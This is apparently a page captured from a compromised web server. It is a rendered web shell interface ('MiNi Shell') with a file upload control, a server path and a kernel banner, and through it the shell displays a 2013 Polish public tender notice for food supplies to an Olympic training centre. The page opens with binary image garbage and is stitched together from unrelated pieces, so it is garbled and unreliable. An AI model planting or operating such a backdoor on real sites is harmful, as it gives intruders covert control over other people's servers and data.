JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130527/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130527/205130-N-2013.html

<p class="kh_header"><b>Władysławowo: Sukcesywne dostawy  artykułów spożywczych różnych   wraz z usługą</b><br>
<b>Numer ogłoszenia: 205130 - 2013; data zamieszczenia: 27.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centralny Ośrodek Sportu w Warszawie, Ośrodek Przygotowań Olimpijskich im. Feliksa Stamma we Władysławowie , ul. Żeromskiego 52, 84-120 Władysławowo, woj. pomorskie, tel. 058 6746314, faks 058 6746350.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.cetniewo.cos.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytucja Gospodarki Budżetowej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy  artykułów spożywczych różnych   wraz z usługą.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy  artykułów spożywczych różnych  na potrzeby działu gastronomii wraz z usługą transportu do Ośrodka Przygotowań Olimpijskich we Władysławowie  tj. makarony, płatki śniadaniowe, budynie, galaretki,  majonezy , oleje , owoce suszone oraz owoce i warzywa w puszkach itp. przez okres 6 miesięcy. Wartość szacunkowa zamówienia nie przekracza kwoty określonej w przepisach wydanych na podstawie art. 11 ust. 8 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (tekst jednolity: Dz. U. 2010 r. Nr 113 poz. 759 ze zm.)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.83.10.00-2, 15.83.16.00-8, 15.85.00.00-1, 15.85.11.10-2, 15.87.11.10-8, 15.87.12.10-9, 15.87.12.30-5, 15.87.12.50-1, 15.87.12.73-8, 15.61.41.00-6, 15.61.33.13-5, 15.61.33.80-5, 15.61.31.00-9, 15.61.20.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> NIE DOTYCZY</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Jeżeli z upływem 6  miesięcy od dnia podpisania umowy kwota określona w ust. 1 zawartej umowy pozostanie nie zrealizowana, Strony mogą uzgodnić, w formie pisemnego aneksu, realizację niniejszej umowy do momentu osiągnięcia tej kwoty, nie dłużej jednak niż 4 lata od dnia podpisania umowy
2.	Strony zgodnie oświadczają, że ilość podana w formularzu cenowym (załącznik Nr 2 do Umowy) jest szacunkowa. Zamawiający zastrzega sobie prawo, w zależności od preferencji klientów Zamawiającego do zmian ilości (według zamówień częściowych). 
3.	W trakcie realizacji umowy może nastąpić zmiana produktu na równoważny (bez zmiany ceny jednostkowej) w przypadku zaprzestania produkcji asortymentu wskazanego przez Wykonawcę w ofercie. Warunkiem dokonania zmiany jest przedstawienie przez Wykonawcę pisemnego oświadczenia (lub innego dokumentu) producenta o zaprzestaniu produkcji oraz zgoda Zamawiającego na przedstawiony przez Wykonawcę produkt równoważny
4.	W przypadku wprowadzenia przez producenta innej gramatury lub pojemności niż określona w ofercie Wykonawcy Zamawiający dopuszcza w czasie trwania umowy zmianę gramatury lub pojemności produktów konfekcjonowanych - po uzgodnieniu i akceptacji przez obie strony Umowy. Zapisy ust. 3 stosuje się odpowiednio.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.cetniewo.cos.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego : ul. Żeromskiego 52, 84-120 Władysławowo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.06.2013 godzina 11:00, miejsce: Siedziba Zamawiającego : ul. Żeromskiego 52, 84-120 Władysławowo: sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Artykuły spożywcze różne,  przeznaczone do dalszej obróbki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	BUDYŃ-kg	60.
2.	GALARETKA OWOCOWA kg	60.
3.	KISIEL OWOCOWY -kg	60.
4.	MAJONEZ LIGHT - 	kg	15.
5.	CHRZAN TARTY  - kg	30.
6.	KETCHUP porcjowany( saszetka)  szt	12000.
7.	MUSZTARDA porcjowana saszetka - szt	8000.
8.	MUSZTARDA SAREPSKA - 	kg	80.
9.	RYŻ DŁUGOZIARNISTY paraboiled kg	550.
10.	Makaron Cannelloni kg	10.
11.	Makaron  Pene - (rurki) -kg	180.
12.	Makaron typu Penette (piórka) -	kg	40.
13.	MAKARON typu TAGLIATELLE kg	40.
14.	MAKARON typu GNOCHETTI SARDI (muszelka)   	kg	40.
15.	MAKARON typu FARFALLE - (kokardki)  	kg	60.
16.	MAKARON typu CRESTI DI GALLO (kolanka z falbanką)  	kg	40.
17.	MAKARON typu QUADRUCCI (Łazanki) kg	40.
18.	MAKARON typu MACCARONI (Nitka cięta) - kg	40.
19.	MAKARON W KSZTAŁCIE RYŻU kg	30.
20.	MAKARON typu SPAGHETTI -	kg	120.
21.	MAKARON typu FUSILI (świderki) 	kg	120.
22.	MAKARON typu LASAGNE 	kg	60.
23.	Makaron typu Fusili Tricolore (Świderki 3 kolory) - 	kg	120.
24.	PŁATKI KUKURYDZIANE typu CORN FLAKES  - 	kg	50.
25.	PŁATKI KUKURYDZIANE typu GOLD FLAKES kg	60.
26.	PŁATKI KUKURYDZIANE cynamonowe kg	70.
27.	PŁATKI zbożowe czekoladowe - kg	50.
28.	PŁATKI KUKURYDZIANE z miodem i orzechami -	kg	40.
29.	PŁATKI KUKURYDZIANE typu FITNESS 	kg	50.
30.	PŁATKI MUSLI 	kg	50.
31.	MAJONEZ porcjowany 	szt	5000.
32.	MAJONEZ DEKORACYJNY -kg	300.
33.	MAJONEZ DEKORACYJNY 	kg	80.
34.	KETCHUP łagodny -kg	50.
35.	KETCHUP  kg	50..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.83.10.00-2, 15.83.16.00-8, 15.85.00.00-1, 15.85.11.10-2, 15.87.11.10-8, 15.87.12.10-9, 15.87.12.30-5, 15.87.12.50-1, 15.87.12.73-8, 15.61.41.00-6, 15.61.33.13-5, 15.61.33.80-5, 15.61.31.00-9, 15.61.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Artykuły spożywcze różne, owoce i warzywa w zalewach, dodatki do dań.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. 	ORZECH WŁOSKI ŁUSKANY 	kg	90.
2. 	RODZYNKI SUŁTAŃSKIE - kg	120.
3. 	ŚLIWKA KALIFORNIJSKA bez pestki -	kg	120.
4. 	MIGDAŁY PŁATKI - 	kg	30.
5. 	MIGDAŁY CAŁE - 	kg	5.
6. 	ORZECH LASKOWY-kg	10.
7. 	MORELE SUSZONE - 	kg	80.
8. 	Ananas kostka - kg	70.
9. 	ANANASY PLASTRY,	kg	50.
10. 	BRZOSKWINIE POŁÓWKI kg	80.
11. 	GRUSZKI  POŁÓWKI w syropie -	kg	50.
12. 	KOKTAJL OWOCOWY W SYROPIE- 	kg	60.
13. 	FASOLA CZERWONA 	kg	180.
14. 	GROSZEK KONSERWOWY kg	100.
15. 	KUKURYDZA KONSERWOWA kg	200.
16. 	KIELKI FASOLI MUNG kg	100.
17. 	SAŁATKA typu HAWAI kg	80..
18. 	SAŁATKA typu  SOMBRERO - kg	70.
19. 	OGÓRKI konserwowe - 	kg	120.
20. 	PIECZARKA MARYNOWANA CAŁA - 	kg	30.
21. 	Pieczarka w zalewie naturalnej - kg	40.
22. 	Karczochy serca - kg	2.
23. 	OLEJ  uniwersalny -	1000 l.
24. 	OLIWKI ZIELONE DRYLOWANE -kg	20.
25. 	OLIWKI CZARNE DRYLOWANE - kg	20.
26. 	OLIWKI ZIELONE cięte - kg	50.
27. 	OLIWKI Czarne cięte kg	50.
28. 	TUŃCZYK W SOSIE WŁASNYM ( kawałki )  	kg	20.
29. 	TUŃCZYK W SOSIE WŁASNYM ( kawałki )   kg	20.
30. 	OCET 10% spirytusowy -l	70.
31. 	OCET WINNY - l	20.
32. 	Ocet WINNY - l	20.
33. 	JABŁKA PRAŻONE typu  SZARLOTKA - kg	80.
34. 	OGÓRKI KANAPKOWE - kg	30.
35. 	CZEREŚNIE koktajlowe - Marascino Cherries kg	2.
36. 	SELER WIÓRKI 	kg	25.
37. 	OLEJ  z pestek winogron - 	l	40.
38. 	Oliwa z oliwek pomace -  l	60.
39. 	Oliwa z oliwek extra virgin - 	l	60.
40. 	KAWIOR  czarny lub czerwony kg	2.
41. 	NAPÓJ KAKAOWY kg	80.
42. 	SYROP MALINOWY- l	40.
43. 	Syrop korzenny - l	20.
44. 	SEZAM ZIARNO - 	kg	10.
45. 	DŻEM  truskawka, wiśnia, czarna porzeczka 	kg	200.
46. 	MIÓD PSZCZELI NATURALNY WIELOKWIATOWY 	kg	200.
47. 	AROMAT POMARAŃCZOWY	szt	30.
48. 	CUKIER WANILIOWY 	kg	10.
49. 	TABASCO BRAND Peper Sauce- szt	10.
50. 	Pieczywo WASA Light żytnie kg	10.
51. 	KASZA GRYCZANA - 	kg	120.
52. 	KASZA JĘCZMIENNA 	kg	50.
53. 	Ryż biały zwykły -	kg	20.
54. 	MĄKA TORTOWA typ 450 - 	kg	700.
55. 	SKROBIA ZIEMNIACZANA - 	kg	50.
56. 	RYŻ DZIKI - 	kg	4.
57. 	RYŻ BRĄZOWY -  	kg	4.
58. 	KASZA KUS-KUS - 	kg	10.
59. 	PŁATKI OWSIANE -  kg	30.
60. 	CUKIER BIAŁY KRYSZTAŁ  	kg	950.
61. 	CUKIER PUDER -	kg	40.
62. 	Orzechy pistacjowe kg	2.
63. 	Orzeszki pini opakowanie 	kg	1.
64. 	Pomidory suszone w oliwie - kg	15.
65. 	Ziarno słonecznika -	kg	10.
66. 	Migdały Słupki -kg	2.
67. 	Wiórki kokosowe - kg	5.
68. 	Kotlety schabowe  sojowe - 	kg	5.
69. 	Steki sojowe -  kg	5.
70. 	Żurawina do mięsa - kg	15.
71. 	Kasza manna -	kg	50.
72. 	Kaszka kukurydziana - kg	20.
73. 	Mąka kukurydziana 	kg	5.
74. 	Cukier brązowy trzcinowy - kg	10.
75. 	Mandarynki - kg	15.
76. 	Pędy bambusa - 	kg	20.
77. 	Krem czekoladowo-orzechowy 	kg	220.
78. 	Musztarda Francuska - kg	5.
79. 	Ocet Balsamiczny- 	l	5.
80. 	Kardamon mielony - 	kg	0,5.
81. 	imbir mielony - 	kg	3.
82. 	Tortilla pszenna 	kg	40.
83. 	Olej arachidowy - 	l	5.
84. 	Ciecierzyca - 	kg	10.
85. 	Papryka konserwowa czerwona paski -kg	40.
86. 	Proszek do pieczenia, 	kg	2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.83.10.00-2, 15.83.16.00-8, 15.85.00.00-1, 15.85.11.10-2, 15.87.11.10-8, 15.87.12.10-9, 15.87.12.30-5, 15.87.12.50-1, 15.87.12.73-8, 15.61.41.00-6, 15.61.33.13-5, 15.61.33.80-5, 15.61.31.00-9, 15.61.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com